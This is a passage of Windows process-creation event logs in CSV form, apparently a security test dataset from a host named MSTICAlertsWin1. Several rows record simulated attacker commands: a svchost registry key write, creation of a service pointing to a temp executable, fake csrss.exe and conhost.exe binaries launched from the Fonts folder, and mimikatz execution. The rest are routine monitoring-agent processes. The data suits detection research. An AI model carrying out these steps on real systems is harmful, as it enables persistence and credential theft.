215,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.490,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1624,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.490
216,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1628,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg delete ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.537
217,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.583,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1654,C:\Windows\System32\sc.exe,%%1936,0xbc8,"sc create MSTICTestService binPath=C:\Users\MSTICA~1\AppData\Local\Temp\hd.exe DisplayName=""Test Service""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.583
218,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Windows\System32\sc.exe,%%1936,0xbc8,sc delete MSTICTestService,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.617
219,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:20.623,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\System32\wermgr.exe,%%1936,0x440,C:\Windows\system32\wermgr.exe -upload,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:20.623
220,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16c4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:26.013
221,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.033,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1724,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""echo blahtest > \\.\pipe\blahtest""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.033
222,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1744,C:\Windows\System32\win32calc.exe,%%1936,0x1724,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.100
223,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.157,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg.exe add ""hkcu\console"" /v windowposition /t reg_dword /d 33554556 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.157
224,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.227,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1778,C:\Windows\System32\win32calc.exe,%%1936,0x1758,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\reg.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.227
225,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.293,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x178c,C:\Windows\Fonts\csrss.exe,%%1936,0xbc8,c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.293
226,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.377,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17ac,C:\Windows\System32\win32calc.exe,%%1936,0x178c,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\Fonts\csrss.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.377
227,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17bc,C:\Windows\System32\win32calc.exe,%%1936,0x17ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\System32\win32calc.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
228,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17c0,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\System32\svchost.exe -k WerSvcGroup,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
229,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17dc,C:\Windows\System32\WerFault.exe,%%1936,0x17ac,C:\Windows\system32\WerFault.exe -u -p 6060 -s 472,C:\Windows\System32\win32calc.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.490
230,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e4,C:\Windows\Fonts\conhost.exe,%%1936,0xbc8,c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.493
231,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1440,C:\Diagnostics\UserTmp\mimikatz.exe,%%1936,0xbc8,.\mimikatz.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.563
232,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32.exe /C c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.613
233,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.640,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1424,C:\Windows\Fonts\conhost.exe,%%1936,0x1434,c:\windows\fonts\conhost.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.640
234,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.693,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32 /u /s c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.693
235,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Windows\System32\tasklist.exe,%%1936,0xbc8,tasklist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.770
236,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:05:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:05:26.000
237,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.000
238,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.043,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11ac,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.043
239,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd04,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:25.770
240,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:26.000
241,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.010
242,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e4,C:\Windows\System32\conhost.exe,%%1936,0x13e4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.030
243,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:25.583,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:25.583
244,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:26.000
245,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:25:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:25:26.000
246,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x57c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.000
247,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Windows\System32\conhost.exe,%%1936,0x57c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.017
248,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:25.833,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd78,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:25.833
249,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1054,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:26.007
250,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:41:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12dc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:41:26.000
251,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.000
252,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0xb8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.017
253,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.387,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.387
254,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.437,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd80,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.437
255,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:26.007
256,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.240,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,%%1936,0xa40,"""CollectGuestLogs.exe"" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df5-bd9b-e932e7433077.zip",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.240
257,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.253,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.253
258,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x54c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:26.000
259,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x93c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:19:26.000
260,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.000
261,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.017
262,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:25.423,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:25.423
263,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:26.007
264,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:31:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:31:26.000
265,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.010
266,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x125c,C:\Windows\System32\conhost.exe,%%1936,0xa08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.027
